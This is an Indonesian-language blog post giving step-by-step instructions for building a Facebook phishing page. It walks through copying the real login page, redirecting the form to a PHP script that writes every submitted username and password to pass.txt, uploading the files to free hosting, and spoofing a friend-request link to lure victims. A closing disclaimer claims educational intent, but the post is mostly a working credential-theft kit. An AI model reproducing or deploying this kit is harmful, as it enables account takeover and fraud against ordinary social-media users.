11 November 2018

Cara membuat laman phising FB



Cara Membuat Laman Phising Facebook


Phising adalah suatu metode yang di gunakan hacker untuk mencuri password dengan cara mengelabui target menggunakan fake form login pada situs palsu yang menyerupai situs aslinya.
pada beberapa kasus, situs palsu tersebut tidak terlalu mirip namun karena target kurang berhati hati dan tidak punya pengalaman tentang metode phishing maka bisa saja terjebak.

Istilah phishing dalam bahasa Inggris berasal dari kata fishing alias memancing, dalam hal ini maksudnya adalah memancing informasi dan kata sandi pengguna.

Cara kerja phising:

   Dengan suatu cara para hacker membuat kita melakukan klik terhadap link situs palsu mereka, bisa dengan sebuah gambar menarik di media sosial, pesan penipuan pada email dan lain sebagainya.

   Saat kita megKlik link tersebut, kita akan di arahkan ke situs palsu yang mana pada situs tersebut terdapat form isian misalnya form login facebook dengan kata kata yang meyakinkan bahwa facebook kita telah logout dan meminta kita memasukkan username dan password kembali. Orang-orang biasanya tidak menyangka bahwa situs tersebut hanyalah tiruan akan mengisi saja username dan password tanpa curiga.

   Apa yang kita masukkan ke form isian itu akan tersimpan di server si Hacker. Jadi kita masih punya waktu untuk merubah password kita sebelum si Hacker melihat username dan password kita di servernya.

   Akun kita akan di ambil alih. Hacker kemungkinan besar menggunakan akun kita untuk menyebarkan link psihing lainya ke teman teman kita untuk mendapatkan korban yang lebih banyak.

   Meretas password dengan metode phishing adalah yang paling mudah di praktikkan, itu sebabnya banyak sekali di dunia maya tersebar rujukan alamat alamat yang mengarahkan browser kita ke alamat web pishing atau web palsu.

   Pada kesempatan kali ini saya akan membahas cara membuat Laman Phising yang biasanya digunakan para Hacker untuk melakukan aksinya. Caranya cukup mudah kalian tidak butuh belajar lebih tentang pemrograman dan lain sebagainya karena hal ini sangatlah mudah untuk dilakukan.

   Berikut adalah cara membuat Laman Phising Facebook;

1. Buka http://www.facebook.com/login.php

2. Klik Kanan >> View Page Source atau tekan CTRL + U

3. Copy semua kode yang ada disitu kemudian paste ke notepad

4. Tekan CTRL + F kemudian cari kata action=

5..Ubah.action="https://www.facebook.com/login.php?login_attempt=1" menjadi action="next.php" .. Ubah juga method dari POST menjadi get

6. Simpan notepad ini dengan nama login.php

7. Buat notepad baru kemudian isikan kode berikut

<?php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("pass.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan

8. Simpan Dengan Nama next.php

9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt

10. Kemudian Upload ke tiga file tersebut "login.php, next.php, pass.txt" ke alamat free hosting misalnya http://000webhost.com,http://idhostinger.com, http://spam.com atau 1freehostinger.

Cara spoofingnya;

1. Copy content asli undangan pertemanan dari facebook.

2. Edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"

3. Ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.

   Mudah sekali bukan, ternyata hal-hal luarbiasa yang Hacker lakukan ternyata tdak serumit itu kan. Karena itu juga banyak sekali kejahatan Cyber saat ini, banyak orang-orang tidak betanggung jawab melakukan Hacking pada para pengguna internet. Jadi sebaiknya anda berhati-hati saat anda disuruh melakukan pengisian data diri anda di internet, agar kejadian seperti ini tiddak terjadi.
   Semua yang anda pelajari diatas adalah kebijakan anda sendiri. Saya mengajarkan ini agar orang-orang tahu betapa mudahnya para Hacker melakukan aksi yang dapat merugikan orang banyak. Dan untuk pengetahuan bagi kalian semua, bukan untuk mengajarkan kepada hal yang buruk. 

   Sedikit yang bisa saya sampaikan, jadikan hal ini sebagai Ilmu Pengetahuan bukan untuk melakukan Hacking pada orang-orang. Dan semoga kalian tetap mendukung kami dengan terus mengunjungi blog ini. Kunjungan Anda Sangat Berarti Bagi Kami. Sekian.




#Amin CN96

7 comments: